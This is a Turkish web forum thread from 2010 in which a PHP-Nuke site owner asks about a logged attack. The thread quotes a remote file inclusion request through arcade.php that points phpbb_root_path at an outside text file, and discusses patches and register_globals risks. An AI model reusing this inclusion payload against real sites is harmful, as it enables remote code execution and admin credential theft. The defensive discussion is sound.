Tarih: 2010-02-20, 12:41:17 Mesaj konusu: 2 dakika içinde 5 farklı bölgedeki İP no banlandı,
Sitemdeki Nuke Sentinel 2 dk içinde 5 farklı İp noyu banladı. İp nolara baktığımda hepsi farklı yabancı ülkeye ait
124.193.89.** : ÇİN
88.191.43.** : FRANSA
94.23.115.** : KİNGDOM
203.84.249.** : KORE
219.117.205.** JAPONYA
Sorgulama yapımında ise şu link bulunuyor.
www.siteismi. com/ modules.php?name=forums/arcade.php? phpbb_root_path=http://www. sinhvienqb.com/news/idbun1. txt
(linklerin arasını ayırdım)
Bu bir çeşit saldırımı oluyor?
Bilen arakadaşlardan yorum bekliyorum.
Forumlar dolaşırken şöyle bir şey buldum
Alıntı:
dün sitemde arcade.php üzerinden admin şifremi ele gecirmişler expolit çalıştırırak eğer sizinde powernuke kurulu siteniz varsa şu değişiklikleri mutalaka yapın:
Arcade.php , functions.php , functions_arcade.php de aşagıdaki kodu bulun;
Kod:
include($phpbb_root_pathve bu kodun basındakı " $ " harfini silin..
Tarih: 2010-02-20, 19:16:26 Mesaj konusu:
Aslında phpbb_root_path da aynı nuke prefixi gibi değiştirilmesi gereken sabit tanımlardan biri.
Nasıl ki bu tür standart saldırılar için nuke_ şeklindeki prefixi değiştirmek bir önlemse aynı şekilde phpbb_root_path da değiştirilmesi gereken bir şey.
Ama değiştirilmesi biraz daha zor olduğu için genelde kimse ilgilenmiyor.
Benim sitelerde phpbb_root_path yok örneğin. (Veritabanı içinde de, source dosyaları içinde de yok)
Yani yukarıdaki sorgu bu şekilde işlev göremeyecekti zaten.
Bir scriptin standart değerlerini ne kadar çok kullanırsanız, eline taş alan küçük çocukların o kadar kolay hedefi olursunuz.
değişkenin değil, mantalitenin değiştirilmesi gerekiyor. register globals mantığı ile çalışmak güvenli birşey değil. $_GET['phpbb_root_path'] ile $phpbb_root_path aynı olmamalı. Tabi register global off olsa bu seferde mainfile import ediyor değişkenleri, dolayısıylada böyle riskli şeyler çıkıyor ortaya. O yüzden her değişkene bir ön tanım vermek şart oluyor. Bazı bloklarda bile benzer sorunlar var ama echo fonksiyonu kullanıldığından sayfa çıktısı ile anlık oynanabiliyo.
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız